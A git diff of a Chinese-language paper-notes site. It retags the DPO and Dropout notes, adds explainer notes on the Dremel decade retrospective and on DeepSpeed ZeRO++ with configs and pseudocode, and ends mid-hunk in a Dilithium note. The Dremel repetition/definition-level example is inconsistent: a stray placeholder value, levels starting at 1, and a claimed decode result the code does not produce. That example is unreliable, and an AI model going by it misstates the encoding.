a/src/content/docs/papers/dpo.md +++ b/src/content/docs/papers/dpo.md @@ -2,7 +2,7 @@ title: 'DPO — Direct Preference Optimization' 来源: 'Rafailov et al., "Direct Preference Optimization: Your Language Model is Secretly a Reward Model", NeurIPS 2023' 日期: 2026-05-29 -子分类: NLP +子分类: ml 分类: NLP 难度: 中级 schema_version: legacy-short diff --git a/src/content/docs/papers/dqn.md b/src/content/docs/papers/dqn.md index c8f04634d..b6257263e 100644 --- a/src/content/docs/papers/dqn.md +++ b/src/content/docs/papers/dqn.md @@ -149,6 +149,7 @@ DeepMind 2017 发表 Rainbow——把 DQN 之后 5 项改进(Double DQN / Duel - [[fsrs-spaced-repetition]] —— FSRS — 让 Anki 知道每张卡什么时候快被你忘掉 - [[muzero]] —— MuZero — 不用规则也能下棋 - [[ppo]] —— PPO — Proximal Policy Optimization +- [[ray-2018]] —— Ray — 面向新兴 AI 应用的分布式框架 - [[scaling-laws]] —— Scaling Laws — 神经语言模型的缩放规律 - [[td3-2018]] —— TD3 — 给 DDPG 装两副刹车,连续控制终于稳了 diff --git a/src/content/docs/papers/dremel-decade-2020.md b/src/content/docs/papers/dremel-decade-2020.md new file mode 100644 index 000000000..005cd4919 --- /dev/null +++ b/src/content/docs/papers/dremel-decade-2020.md @@ -0,0 +1,314 @@ +--- +title: Dremel 十年回顾 — Web 规模交互式 SQL 分析如何演化为 BigQuery +来源: https://research.google/pubs/dremel-a-decade-of-interactive-sql-analysis-at-web-scale/ +日期: 2026-06-13 +子分类: 存储与查询 +分类: 数据库 +provenance: pipeline-v3 +--- + +## 从日常类比开始:从「单位档案室」到「全城公共查询台」 + +想象你所在的城市要统计**所有市民的网购行为**——订单、商品、收货地址、嵌套在订单里的每一行 SKU,数据量相当于把全市档案堆成山。 + +2010 年之前的 Google 内部,主流做法是: + +- 数据塞进 **MapReduce**,写 Java/C++ 批处理作业; +- 大家心里默认:**「SQL 撑不住 Web 规模」**,交互式分析要么等 overnight job,要么写 Sawzall 这类专用语言。 + +**Dremel**(2006 年立项,2010 年 VLDB 论文公开)像在城市里建了一座**公共查询台**:分析师写一句 SQL,秒级到分钟级拿到聚合结果,不必先 ETL 进传统数仓。**这篇 2020 回顾论文**(PVLDB, pp. 3461–3472,Melnik 等原班作者)回答的是:十年过去,当初哪些设计押对了行业方向?哪些在演进中换了引擎?它们如何沉淀为 **Google BigQuery**? + +类比延伸: + +| 日常场景 | Dremel / BigQuery 对应 | +|----------|------------------------| +| 档案存在各分局,查一次搬一次 | **存算分离**:数据在 Colossus/GCS,算力按需租用 | +| 书在架上就能借,不必先复印进阅览室 | **In situ 分析**:数据湖上多引擎共享同一份列式文件 | +| 图书馆按「借书位」计费,不用包下整栋楼 | **Serverless**:slot 虚拟调度单元,多租户按查询付费 | +| 嵌套目录(卷→章→节)仍可按「节标题」检索 | **嵌套列存**:repetition / definition level 编码 | + +--- + +## 这篇论文是什么 + +**类型**:系统架构回顾(retrospective),不是全新算法论文。 + +**时间线锚点**: + +- **2010**:*Dremel: Interactive Analysis of Web-Scale Datasets* — 多层执行树 + 嵌套列存 + 扩展 SQL; +- **2014 前后**:存储迁移到 **Capacitor** 列式格式;shuffle 基础设施重构; +- **2020**:本文总结五条架构原则如何成为云原生分析系统「标配」,并描述向 **BigQuery** 的演化路径。 + +**作者核心论断**:Dremel 是较早把 **SQL、存算分离、原地分析、Serverless、嵌套列存** 五条线捆在一起量产的系统;十年后的 Snowflake、Presto/Trino、Spark SQL、ClickHouse 云版都在不同程度上复现了这套组合。 + +--- + +## 2010 年的问题:为什么需要 Dremel + +Google 内部数据几乎全是 **Protocol Buffers** 嵌套结构:日志、广告点击、网页索引元数据。MapReduce 能 scale,但: + +1. **开发成本高**:每个 ad hoc 问题都要写分布式 job; +2. **交互延迟 unacceptable**:分析师等批处理排期,迭代慢; +3. **嵌套数据与 SQL 割裂**:传统数仓要 flatten + ETL, schema 一变 pipeline 就断。 + +Dremel 的赌注:**用 SQL 直接查嵌套只读数据**,通过列式布局 + 分布式 serving tree 把聚合压到秒级。Franklin 在 2010 评论里预言「万亿行 soon 会普及」——回顾论文证实这条曲线已被 BigQuery 外部客户反复验证。 + +--- + +## 五条经受住时间考验的架构原则 + +### 1. SQL 重新成为大数据 API + +2010 年业界流行「SQL is dead for interactive analytics」。Dremel 用扩展 SQL(点号访问嵌套字段、`RECORD` 类型)证明:**声明式查询 + 优化器** 仍是最低摩擦接口。后续 Dremel SQL 方言逐步 **ANSI 化**,并通过开源库共享给 **Cloud Spanner** 等产品。 + +**演进**:早期刻意**弱化 join**(依赖 protobuf 反规范化);后期 BigQuery 补齐分布式 join、子查询、窗口函数,并引入基于新 shuffle 层的 **shuffle join**。 + +### 2. 存算分离(Disaggregated Storage & Compute) + +最初 Dremel 是 **shared-nothing**:计算与本地磁盘绑定。迁移到 **GFS**(后 **Colossus**)后,性能一度下降;经 I/O 合并、本地缓存、预读调优后,分离架构在**弹性**与**成本**上反超本地盘方案。 + +收益: + +- 存储与计算**独立扩缩**; +- 同一份数据可被 MapReduce、Dremel、其他引擎**并发读取**; +- 故障域分离:坏盘不拖垮整个计算池。 + +### 3. In situ 分析(数据湖范式先驱) + +Dremel 把列式格式开放为 Google 内部库,具备两大属性: + +- **Columnar**:分析型扫描友好; +- **Self-describing**:文件自带 schema,无需先 load 进专有数仓。 + +MapReduce job 可写列式结果,Dremel **立刻** SQL 查询——这就是现代 **data lake + multiple compute engines** 的原型。BigQuery 后来支持 Bigtable、Cloud Storage、Google Drive 等作为 join 外表。 + +### 4. Serverless 多租户分析 + +从一开始 Dremel 就是**全托管内部服务**:无 upfront 容量规划,**按用量计费**。要支撑数千内部用户、亚秒到秒级交互,必须: + +- **Disaggregation**:算力、存储、内存独立伸缩; +- **Fault tolerance & restartability**:子任务确定性可重放;调度器可派发同一 task 的多个副本; +- **Virtual Scheduling Units(slots)**:调度逻辑不绑定具体机器型号,抽象为 slot(CPU+内存配额); +- **Centralized scheduling**:取代 2010 论文的 leaf dispatcher,由 **query coordinator** 统一编排,提升隔离与利用率。 + +这些能力直接移植到 **BigQuery** 的 serverless 模型。 + +### 5. 嵌套数据的列式存储 + +传统列存假设 flat 表。Dremel 引入 **repetition level** 与 **definition level**,把嵌套/重复结构信息**编码进每一列**,读子字段时不必回溯祖先列。 + +2014 年存储层升级到 **Capacitor**(改进的嵌套列式格式),影响后续 **Parquet** 等生态(嵌套模型与 Dremel 论文一脉相承)。 + +--- + +## 核心机制详解 + +### Repetition Level 与 Definition Level + +以嵌套记录 `Name.Language.Code` 为例(一人多种语言,每种语言多个 code): + +- **Repetition level**:当前值相对路径上,**哪一层 repeated 字段**开始了新数组元素(0 表示新 top-level 记录); +- **Definition level**:当前值相对路径上,**有多少 optional/required 祖先已定义**(NULL 用 definition level 小于最大深度表示)。 + +这样任意列可**单独解码**,无需读取兄弟列——对列投影(只读 `Code`)至关重要。 + +### 多层 Serving 执行树(2010 设计) + +``` +Client → Root Server → Intermediate Servers → Leaf Servers(读 Colossus 列块) + ↑__________________| 聚合结果向上归并 +``` + +Leaf 扫描列块、局部聚合;中间层继续聚合;根返回最终结果。2010 论文强调 **one-pass aggregation** 为主路径——与分析师 workload 匹配。 + +### 十年后的执行层演化(2020 回顾重点) + +| 2010 | 2020 / BigQuery | +|------|-----------------| +| Leaf 本地 dispatcher | **Centralized query coordinator** | +| 执行计划相对静态 | **Dynamic execution plan**:基数估计错了可在运行时改 plan | +| Shuffle 与 stage 紧耦合 | **Shuffle persistence layer**(基于 Colossus):stage 解耦,可 checkpoint、抢占 worker | +| 固定 DAG | **Flexible execution DAG evolution** | + +Shuffle 曾是 MapReduce 时代最贵操作之一;Dremel 团队用 Colossus 构建**持久化 shuffle 层**,使调度器能在 checkpoint 处重新分配 worker,支撑**抢占式多租户**与**更细粒度 fault recovery**。 + +### 查询优化 + +Dremel 采用**分层优化器**:规则重写 + 代价模型结合,针对嵌套列存与 serving tree 生成计划。回顾论文强调:在 disaggregated 架构下,**I/O 与 shuffle 代价模型**与 classic warehouse 不同——网络与 Colossus 读放大成为主导项。 + +--- + +## 代码示例 1:Dremel 风格 SQL 查询嵌套 protobuf 数据 + +以下语法贴近 2010/2020 论文中的 **nested SQL** 示例(概念演示,非特定产品方言): + +```sql +-- 统计每个国家、每种语言下,被访问过的 URL 数量 +SELECT + Name.Country, + lang.code AS language_code, + COUNT(DISTINCT visits.url) AS distinct_urls +FROM + table `logs.web_access` AS t, + UNNEST(t.Name.Language) AS lang, + UNNEST(t.Visits) AS visits +WHERE + visits.date BETWEEN '2020-01-01' AND '2020-01-31' + AND visits.status = 200 +GROUP BY + Name.Country, + language_code +ORDER BY + distinct_urls DESC +LIMIT 100; +``` + +要点: + +- **`Name.Language`** 是 repeated nested field,需 `UNNEST` 展开(现代 BigQuery 语法;2010 论文用点号与特殊聚合语法表达同类语义); +- 查询**只读**嵌套列存文件,无需事先 flatten 成星型模式; +- 优化器可下推 `WHERE visits.status = 200` 到 leaf,利用列块 **zone map / 统计信息** 跳过无关 row group。 + +--- + +## 代码示例 2:Repetition / Definition Level 编码(简化示意) + +假设 schema: + +```text +message Person { + required string Name; + repeated Phone { optional string Number; } +} +``` + +两条记录: + +```text +{Name: "Alice", Phone: [{Number: "111"}, {Number: "222"}]} +{Name: "Bob", Phone: [{Number: null}]} +``` + +`Phone.Number` 列在 Dremel 编码中可能类似(值 + rep + def): + +```python +# 伪代码:展示三列并行数组如何表示嵌套 NULL 与 repeated +values = ["111", "222", None, "Bob端无有效号码时仍占位"] +repetition_levels = [1, 1, 0, 1] # 1=新 Phone 元素, 0=新 Person +definition_levels = [2, 2, 1, 1] # Phone 存在但 Number 为 NULL 时 def 较低 + +def decode_phone_numbers(values, rep, defn, max_def=2): + """从单列还原当前 Person 下的 Number 列表(教学用简化解码器)""" + numbers = [] + current = [] + for v, r, d in zip(values, rep, defn): + if r == 0: + if current: + numbers.append(current) + current = [] + if d == max_def: + current.append(v) + elif d > 0: + current.append(None) # optional 未定义 + if current: + numbers.append(current) + return numbers + +# decode 结果示意: [["111","222"], [None]] +``` + +**为什么重要**:分析查询常只读 `Phone.Number` 一列;rep/def 让引擎**无需读 `Name` 或 `Phone` 的其他子列**即可重建嵌套结构,并与列压缩(RLE、字典编码)叠加。 + +--- + +## 代码示例 3:Serverless Slot 调度(概念伪代码) + +回顾论文强调 **slot** 抽象如何支撑多租户 serverless: + +```python +class QueryCoordinator: + def __init__(self, slot_pool: SlotPool): + self.slots = slot_pool # 全局虚拟 CPU+内存单元,非绑定具体 VM + + def execute(self, query_plan: ExecutionDAG): + root = query_plan.root_stage() + # 中心化调度:按 stage 向 slot_pool 申请 workers + while not query_plan.done(): + stage = query_plan.next_ready_stage() + slots_needed = stage.estimate_slots(cardinality=stage.stats) + workers = self.slots.acquire( + count=slots_needed, + priority=query_plan.tenant_fairness_weight, + ) + # shuffle 中间结果持久化到 Colossus,便于抢占与重试 + handles = [ + w.run_deterministic(stage, shuffle_sink=ColossusShuffle()) + for w in workers + ] + stage_result = self.wait_and_merge(handles, allow_speculative_dup=True) + query_plan.mark_complete(stage, stage_result) + self.slots.release(workers) + return query_plan.final_result() +``` + +与 2010 leaf dispatcher 相比:**调度决策集中**、**shuffle 可持久化**、**任务确定性可重放**——三者共同支撑 BigQuery 式「提交查询即走,无需告诉系统你要多少台机器」。 + +--- + +## 与 2010 原论文的对照阅读 + +| 主题 | 2010 原论文 | 2020 十年回顾 | +|------|-------------|---------------| +| 存储位置 | 本地盘 → 正在迁 GFS | Colossus + Capacitor 成熟 | +| Join | 基本回避 | 分布式 shuffle join | +| 调度 | Leaf dispatcher | Central coordinator + slots | +| 产品形态 | Google 内部服务 | BigQuery 对外 Serverless | +| 行业语境 | SQL 式微 | SQL 一统数据平台 API | + +零基础读者建议:**先读 2020 回顾建立地图,再读 2010 原论文看 serving tree 与 rep/def 细节**。 + +--- + +## 对现代数据栈的影响 + +1. **BigQuery** 直接 lineage 自 Dremel; +2. **Parquet / Arrow** 嵌套模型与 rep/def 思想可追溯至 Dremel 2010; +3. **Snowflake、Redshift Spectrum、Athena** 等「对象存储 + 弹性计算 + SQL」_triad_ 与本文五条原则同构; +4. **Lakehouse**(Delta/Iceberg + 多引擎)是 in situ 分析的工业化版本; +5. **「SQL doesn't scale」** 作为 2000 年代迷思,被 Dremel 系列论文系统性反驳。 + +--- + +## 局限与未竟之处 + +回顾论文也诚实提到: + +- **超大 join** 仍是研究与工程热点;shuffle join 依赖内部网络优化,不完全可移植; +- **Disaggregated 存储** 对极短查询仍可能 I/O 放大,需 aggressive caching; +- **多引擎写同一 data lake** 时的 **schema 演化、ACID 表格式** 在 2020 时仍靠外部系统(Iceberg 等)补齐; +- 内部细节(Capacitor 精确布局、slot 定价模型)在公开论文中着墨有限。 + +--- + +## 自测清单(零基础) + +1. 用一句话向同事解释:**Dremel 2020 回顾论文在讲什么?**(答案方向:架构原则十年验证 + BigQuery 演化。) +2. **存算分离** 相比本地盘 shared-nothing 的两个优点、一个代价? +3. **Repetition level** 与 **definition level** 分别解决什么问题? +4. 为什么说 Dremel 是 **data lake in situ 分析** 的早期实例? +5. **Slot** 调度与 2010 leaf dispatcher 的核心区别? + +--- + +## 延伸阅读 + +- Melnik et al., *Dremel: Interactive Analysis of Web-Scale Datasets*, VLDB 2010 — 原始系统设计。 +- Seattle Report on Database Research — 2020 回顾引用的行业趋势框架。 +- 本仓库笔记:[列式存储格式实证评估](./columnar-storage-formats-2023.md)、[Lakehouse](./lakehouse-2021.md) — 与嵌套列存、湖仓范式衔接。 +- Google Research 原文:https://research.google/pubs/dremel-a-decade-of-interactive-sql-analysis-at-web-scale/ + +--- + +## 一句话总结 + +**Dremel 十年回顾** 不是新算法炫耀,而是一份「架构预言书」的验收报告:SQL、存算分离、原地列式分析、Serverless 多租户与嵌套列存——这五条在 2010 年捆绑出现在 Google 内部查询引擎里,十年后被 BigQuery 与整个云分析行业证明为**默认正确选项**;理解它,等于理解现代「写 SQL 查对象存储上的 PB 级嵌套数据」从何而来。 diff --git a/src/content/docs/papers/dropout-2014.md b/src/content/docs/papers/dropout-2014.md index 0ff795a58..0c4ba94a9 100644 --- a/src/content/docs/papers/dropout-2014.md +++ b/src/content/docs/papers/dropout-2014.md @@ -2,7 +2,7 @@ title: Dropout — 训练时随机关掉一半神经元,反而学得更好 来源: 'Srivastava, Hinton, Krizhevsky, Sutskever, Salakhutdinov, "Dropout: A Simple Way to Prevent Neural Networks from Overfitting", JMLR 2014' 日期: 2026-06-01 -子分类: 模型与训练 +子分类: ml 分类: 机器学习 难度: 入门 provenance: pipeline-v3 diff --git a/src/content/docs/papers/ds-zero-pp-comm.md b/src/content/docs/papers/ds-zero-pp-comm.md new file mode 100644 index 000000000..0f0f21929 --- /dev/null +++ b/src/content/docs/papers/ds-zero-pp-comm.md @@ -0,0 +1,351 @@ +--- +title: ZeRO++ — 巨型模型训练中的极致高效集合通信 +来源: https://arxiv.org/abs/2306.10209 +日期: 2026-06-13 +分类: 机器学习 +子分类: ML 系统 +provenance: pipeline-v3 +--- + +## 从日常类比开始:分布式拼乐高 vs 快递费 + +想象你和 512 个同学要一起拼一座**巨型乐高城堡**(训练 100B+ 参数的大模型): + +- 每人只保管城堡的一小块零件(**ZeRO-3 参数分片**),需要某层积木时,全班**临时凑齐**那一层再开工(**all-gather 权重**)。 +- 每层拼完,大家还要把「哪里拼错了」汇总成一份修正清单(**reduce-scatter 梯度**)。 + +在**同教室**(单节点 NVLink)里,喊一嗓子就能传积木——很快。 +一旦同学分散在**不同城市**(跨节点 InfiniBand / 以太网),每次凑积木都要发**整层 FP16 权重**的快递——带宽一窄,或每人 batch 很小(算得慢、等快递久),训练吞吐立刻被通信拖死。 + +Microsoft DeepSpeed 团队在 ICLR 2024 发表的 **ZeRO++**([arXiv:2306.10209](https://arxiv.org/abs/2306.10209))做的事,相当于给这套协作流程加了三条「省钱快递规则」: + +1. **qwZ**:寄积木前压成 INT8 包裹(体积减半),到岸再解压。 +2. **hpZ**:每个城市留一份「次级副本」,反向传播时**只在同城凑积木**,不再跨城。 +3. **qgZ**:梯度汇总改用 INT4 + all-to-all,**先同城合并再跨城**,且**还原精度后再做加法**,避免低精度累加误差。 + +三者叠加,跨节点通信量从 **3M 降到 0.75M**(M = 模型参数量),384 GPU 上最高约 **2.16×** 吞吐;10B–138B 模型上相对 vanilla ZeRO 最高约 **2.4×**。 + +一句话:**ZeRO++ 不是换优化器,而是给 ZeRO-3 的三次集体通信(前向 gather、反向 gather、梯度 scatter)分别「减肥」。** + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 全称 | ZeRO++: Extremely Efficient Collective Communication for Giant Model Training | +| 机构 | Microsoft(DeepSpeed) | +| 会议 | ICLR 2024 | +| 代码 | [DeepSpeed](https://github.com/deepspeedai/DeepSpeed) — `zero_quantized_weights` / `zero_hpz_partition_size` / `zero_quantized_gradients` | +| 前置 | 必须基于 **ZeRO Stage 3**(参数分片 + 按需 all-gather) | +| 论文 PDF | [2306.10209](https://arxiv.org/pdf/2306.10209.pdf) | + +ZeRO++ 是 **通信优化层**,与 [[flash-attention]]、[[liger-kernel-llm-training]] 等算子优化正交——后者减单卡计算/显存,ZeRO++ 减**多卡之间的 bytes**。 + +--- + +## 为什么重要 + +### 1. ZeRO-3 的隐藏税:每步 3M 通信 + +在 ZeRO-3 下,每个训练 step 典型有三笔「全网级」集体通信(参数量 M): + +| 阶段 | 集体操作 | 通信量 | +|------|----------|--------| +| 前向 | 权重 all-gather | M(FP16) | +| 反向 | 权重 all-gather | M(FP16) | +| 反向末 | 梯度 reduce-scatter | M(FP16) | +| **合计** | | **3M** | + +当 **跨节点带宽低**(云厂商常见 100–400 Gbps IB)或 **每 GPU batch 小**(大模型 + 长上下文 + 多并行维)时,GPU 大量时间在等网络,有效 TFLOPS/GPU 断崖式下跌——论文 Figure 1 在 384 GPU、512 token/GPU 时,带宽从 800Gbps 降到 100Gbps,吞吐可从 ~61 掉到 ~16 TFLOPS/GPU。 + +### 2. 低带宽集群 ≈ 高带宽集群的「平价替代」 + +论文实验表明:在 4× 更高带宽集群上跑 baseline ZeRO 的吞吐,ZeRO++ 在**低带宽**设置下也能接近——对预算有限、跨 AZ 训练的团队,这是直接的 TCO 杠杆。 + +### 3. 零(或极少)改用户训练代码 + +DeepSpeed 官方教程强调:**用户模型代码不用改**,只需 JSON 配置打开三个开关;与 Megatron-DeepSpeed、Hugging Face + DeepSpeed 集成路径兼容。 + +--- + +## 先懂 ZeRO-3:ZeRO++ 改的是哪三次快递 + +```text +ZeRO-3 单 step 通信骨架(简化) + +Forward: + 对每一层 → all-gather 该层权重分片 → 本地算 forward → 释放非本地权重 + +Backward: + 对每一层 → all-gather 该层权重 → 本地算 backward → 本地梯度 + 最后 → reduce-scatter 聚合梯度到各 rank 的分片 + +ZeRO++ 分别动刀: + qwZ → 前向 all-gather 传 INT8 + hpZ → 反向 all-gather 限制在节点内 + qgZ → 梯度 reduce-scatter 换成 INT4 all-to-all + 高精度归约 +``` + +ZeRO 把 optimizer states、梯度、参数都分片,消除数据并行里的冗余副本;ZeRO-3 进一步**连参数也分片**,于是每层计算前必须 gather 完整权重——这是通信量的根源。 + +--- + +## 核心概念 + +### 1. qwZ — Quantized Weight Communication + +**问题**:前向 all-gather 要传完整 FP16 权重,占 M 中的 1M。 + +**做法**: + +- 发送前:按 **block** 做对称 INT8 量化(每块独立 scale,类似分块量化 [Dettmers LLM.int8()])。 +- 接收后:dequant 回 FP16,再算 matmul。 +- 通信量:**M → 0.5M**(50% 减少)。 + +**为什么不能全局一把量化?** 权重动态范围大,整块量化误差高;分块后 BERT 案例量化误差约降 **3×**。论文还自研了高性能 quant/dequant CUDA kernel,并与 all-gather **流水线重叠**,避免「省带宽但算量化太慢」。 + +分块对称 INT8 量化的核心公式(每块独立 scale `s`): + +```python +import torch + +def block_quantize_fp16_to_int8(w: torch.Tensor, block_size: int = 128): + """教学用伪代码:理解 qwZ 为何按块量化而非整 tensor 一把梭。""" + assert w.dtype == torch.float16 + n = w.numel() + pad = (-n) % block_size + if pad: + w = torch.nn.functional.pad(w.flatten(), (0, pad)) + blocks = w.view(-1, block_size) + # 对称量化:scale = max(|block|) / 127 + scale = blocks.abs().amax(dim=1, keepdim=True).clamp(min=1e-8) / 127.0 + q = torch.round(blocks / scale).clamp(-127, 127).to(torch.int8) + return q, scale # 接收端: w_hat = q.float() * scale +``` + +发送端传 `(q, scale)` 的紧凑表示,接收端 dequant 回 FP16 再参与 matmul——**通信传 INT8,计算仍用 FP16**。 + +### 2. hpZ — Hierarchical Partitioning ZeRO + +**问题**:反向 pass again all-gather 权重,又跨节点传 M。 + +**做法 — 双副本分区**: + +- **Primary partition**:与 ZeRO-3 相同,权重分片到**全部** GPU(world size P)。 +- **Secondary partition**:在每个**节点内**再分片一份 FP16 权重副本(secondary group size = 每节点 GPU 数,如 8)。 + +**时间线**: + +1. **Forward**:仍按 primary 做**跨节点** all-gather。 +2. Forward 用完该层权重后,按 **secondary** 重新分片存放。 +3. **Backward**:只需在**节点内** all-gather secondary 副本 → **跨节点通信 = 0**。 +4. **Optimizer step**:仍按 primary 分片更新主副本。 + +**代价**:显存上升。100B 模型、1024 GPU、secondary=16 GPU/组时,hpZ 比 ZeRO-3 多用约 **8.9×** 参数相关内存,但仍比标准 DP 全复制少 **114×**(论文 Figure 4)。 + +配置项 `zero_hpz_partition_size`:secondary 组大小;设为**每节点 GPU 数**为典型值;=1 表示关闭 hpZ。 + +### 3. qgZ — Quantized Gradient Communication + +**问题**:直接对 reduce-scatter 做 INT4/INT8 **低精度归约**会累积误差,损害收敛。 + +**做法 — all-to-all 范式**: + +1. 各 rank 对本地梯度做 **block INT4 量化**。 +2. **all-to-all** 交换量化块(可 hierarchical:先节点内再节点间)。 +3. 接收方 **dequant 回 FP16**,再做 **高精度 sum**。 +4. 必要时 **tensor slice reorder** 修正 all-to-all 带来的梯度错位(论文 Figure 9)。 + +**效果**:跨节点梯度通信 **M → 0.25M**(INT4 相对 FP16 约 4× 压缩)。相对 ring reduce-scatter,1-hop all-to-all 延迟更低;并与 intra/inter-node 通信 **pipeline + kernel fusion**。 + +### 4. 三者合计:4× 跨节点通信 + +| 通信点 | Baseline ZeRO-3 | ZeRO++ | +|--------|-------------------|--------| +| 前向权重 gather | M | **0.5M**(qwZ) | +| 反向权重 gather | M | **0**(hpZ,节点内) | +| 梯度 scatter | M | **0.25M**(qgZ,跨节点部分) | +| **跨节点合计** | **3M** | **0.75M** | + +注意:三项收益**不完全线性相加**(论文消融说明存在 overlap 与 pipeline 交互),但方向一致。 + +--- + +## 代码示例 1:DeepSpeed JSON 开启 ZeRO++ + +ZeRO++ 扩展 ZeRO-3,三个布尔/整数开关可独立或组合启用: + +```json +{ + "train_batch_size": 512, + "train_micro_batch_size_per_gpu": 1, + "gradient_accumulation_steps": 32, + "fp16": { + "enabled": true + }, + "zero_optimization": { + "stage": 3, + "reduce_bucket_size": 10000000, + "reduce_scatter": true, + "contiguous_gradients": true, + "overlap_comm": true, + + "zero_quantized_weights": true, + "zero_hpz_partition_size": 8, + "zero_quantized_gradients": true + } +} +``` + +| 字段 | 含义 | 推荐 | +|------|------|------| +| `zero_quantized_weights` | 启用 qwZ(INT8 权重 all-gather) | 跨节点带宽紧张时 `true` | +| `zero_hpz_partition_size` | hpZ secondary 组大小;1=关闭 | 设为**每节点 GPU 数**(如 DGX 8 卡 → 8) | +| `zero_quantized_gradients` | 启用 qgZ(INT4 梯度 all-to-all) | 大模型 + 多节点时 `true` | + +Megatron-DeepSpeed 启动示例(摘自官方 zeropp 教程): + +```bash +deepspeed pretrain_gpt.py \ + --tensor-model-parallel-size 1 \ + --pipeline-model-parallel-size 1 \ + --num-layers 40 \ + --hidden-size 6144 \ + --seq-length 512 \ + --num-attention-heads 32 \ + --micro-batch-size 1 \ + --zero-stage 3 \ + --deepspeed_config ds_zeropp_config.json \ + --deepspeed-activation-checkpointing \ + --fp16 +``` + +--- + +## 代码示例 2:Hugging Face Trainer + DeepSpeed 集成 + +若用 Transformers,通常把 ZeRO++ 写进 DeepSpeed config,由 `TrainingArguments(deepspeed=...)` 加载: + +```python +# ds_zero_pp.json 内容同示例 1 +from transformers import AutoModelForCausalLM, TrainingArguments, Trainer + +model = AutoModelForCausalLM.from_pretrained("meta-llama/Llama-2-7b-hf") + +training_args = TrainingArguments( + output_dir="./out", + per_device_train_batch_size=1, + gradient_accumulation_steps=16, + bf16=True, + deepspeed="ds_zero_pp.json", + logging_steps=10, +) + +trainer = Trainer(model=model, args=training_args, train_dataset=dataset) +trainer.train() +``` + +**实践提示**: + +- ZeRO++ **仅 Stage 3**;Stage 1/2 无参数分片 all-gather,开关无效。 +- hpZ 增显存:7B 模型通常可接受;100B+ 需结合 **activation checkpointing**、**offload** 或减小 secondary 组评估 OOM。 +- 与 **TP/PP** 混用时,以 DeepSpeed 文档为准确认 data parallel group 与 hpZ 组对齐。 + +--- + +## 代码示例 3:用伪代码理解 hpZ 的「双分区」 + +下面不是 DeepSpeed 源码,而是帮助理解 **forward 用 primary、backward 用 secondary** 的逻辑: + +```python +def forward_layer(layer_id, x, primary_group, secondary_group): + # 跨所有 rank gather(可能跨节点) + W_full = all_gather_shard(local_W_shard, group=primary_group) + y = matmul(x, W_full) + # 用完后按节点内 secondary 组分片存回去 + W_secondary_shard = repartition(W_full, group=secondary_group) + free(W_full) + return y, W_secondary_shard + + +def backward_layer(x, grad_y, W_secondary_shard, secondary_group): + # 只在节点内 gather,无跨节点权重流量 + W_full = all_gather_shard(W_secondary_shard, group=secondary_group) + grad_W = backward_matmul(x, grad_y, W_full) + return grad_W +``` + +这正是 hpZ「**用内存买跨节点带宽**」的精髓:多存一份节点内 FP16 分片,换掉反向 pass 里最贵的那次跨机 all-gather。 + +--- + +## 实验结论(论文摘要) + +| 场景 | 结果 | +|------|------| +| 规模 | 最高 **384 GPU**,GPT 类模型 | +| 吞吐 | 小 batch 下仍可达峰值算力 **45%+**;相对 ZeRO 最高 **~2.4×**(10B–138B) | +| 384 GPU 全开启 | **2.165×**(hpZ + qwZ + qgZ) | +| RLHF 训练 | 相对 vanilla ZeRO 最高约 **3.3×**(通信更敏感的对齐阶段) | +| 收敛 | 预训练 13B(8/6-bit gather)、微调 30B(4/2-bit gather)与标准 ZeRO **精度持平** | +| 推理副产品 | 训练结束权重已是低比特分块量化形态,可**跳过 PTQ/QAT** 直接用于推理 | +| 对比 MiCS | hpZ 与 MiCS 等 hierarchical ZeRO 思路相近,ZeRO++ 在 DeepSpeed 栈内一体化 | + +论文还消融了仅开 qwZ、仅开 hpZ、仅开 qgZ 的组合,便于按集群拓扑「按需点菜」。 + +--- + +## 何时用 / 何时慎用 + +**适合**: + +- 多节点训练,**跨节点带宽**明显低于 NVLink。 +- 大模型导致 **micro-batch 很小**,计算/通信比差。 +- 已用 ZeRO-3,profiler 显示 **all-gather / reduce-scatter** 占比高。 + +**慎用 / 需测**: + +- **单节点**多卡:hpZ 跨节点收益为 0,qwZ/qgZ 仍有但增益变小。 +- **显存极度紧张**:hpZ secondary 副本可能触发 OOM——先 profiling 内存。 +- 与某些 **自定义通信 hook** 或旧版 DeepSpeed 混用:需查 release note。 + +--- + +## 与相关工作的关系 + +| 方向 | 代表 | 与 ZeRO++ 关系 | +|------|------|----------------| +| 参数分片 | ZeRO / ZeRO-3 | ZeRO++ 直接扩展 | +| 分层通信 | MiCS | hpZ 同类 hierarchical partition 思想 | +| 梯度压缩 | PowerSGD、1-bit Adam | qgZ 强调 **dequant 后再归约**,避免低精度 sum | +| 算子融合 | [[liger-kernel-llm-training]]、[[flashattention-2]] | 互补:减单卡 work,ZeRO++ 减多卡 bytes | +| 3D 并行 | Megatron TP/PP/DP | 可叠加;通信瓶颈仍在 DP/ZeRO 侧 | + +--- + +## 自测题 + +1. ZeRO-3 一步训练里,哪三次集体通信贡献了 **3M** 通信量?ZeRO++ 分别怎么压? +2. 为什么 qgZ 不能简单做 **INT4 reduce-scatter**,而要用 all-to-all + 高精度归约? +3. `zero_hpz_partition_size=8` 在一台 8 卡机器上意味着什么?若设为 1 呢? +4. hpZ 的 secondary 副本存在哪个粒度(节点内 / 全局)?Optimizer 更新跟哪套分片走? + +
+参考答案 + +1. 前向权重 all-gather(M)、反向权重 all-gather(M)、梯度 reduce-scatter(M)。qwZ 把前向压到 0.5M;hpZ 把反向跨节点压到 0;qgZ 把梯度跨节点压到约 0.25M。 +2. 低精度直接累加会放大量化误差,损害收敛;qgZ 先传 INT4,接收后 dequant 到 FP16 再 sum。 +3. =8 表示 secondary 组含 8 GPU,通常即整节点,反向权重 gather 不跨节点;=1 关闭 hpZ,行为退回 ZeRO-3。 +4. Secondary 在**节点内**(或可配置子组)分片;optimizer step 更新 **primary** 全局分片。 + +
+ +--- + +## 延伸阅读 + +- DeepSpeed ZeRO 教程:[ZeRO](https://www.deepspeed.ai/tutorials/zero/) +- DeepSpeed ZeRO++ 教程:[zeropp.md](https://github.com/deepspeedai/DeepSpeed/blob/master/docs/_tutorials/zeropp.md) +- 微软研究院博文:[DeepSpeed ZeRO++ — 4× less communication](https://www.microsoft.com/en-us/research/blog/deepspeed-zero-a-leap-in-speed-for-llm-and-chat-model-training-with-4x-less-communication/) +- 原始论文:[arXiv:2306.10209](https://arxiv.org/abs/2306.10209) diff --git a/src/content/docs/papers/ducas-dilithium-2018.md b/src/content/docs/papers/ducas-dilithium-2018.md index 88f2b16de..164435b37 100644 --- a/src/content/docs/papers/ducas-dilithium-2018.md +++ b/src/content/docs/papers/ducas-dilithium-2018.md @@ -184,6 +184,9 @@ sign_with_rejection(secret, 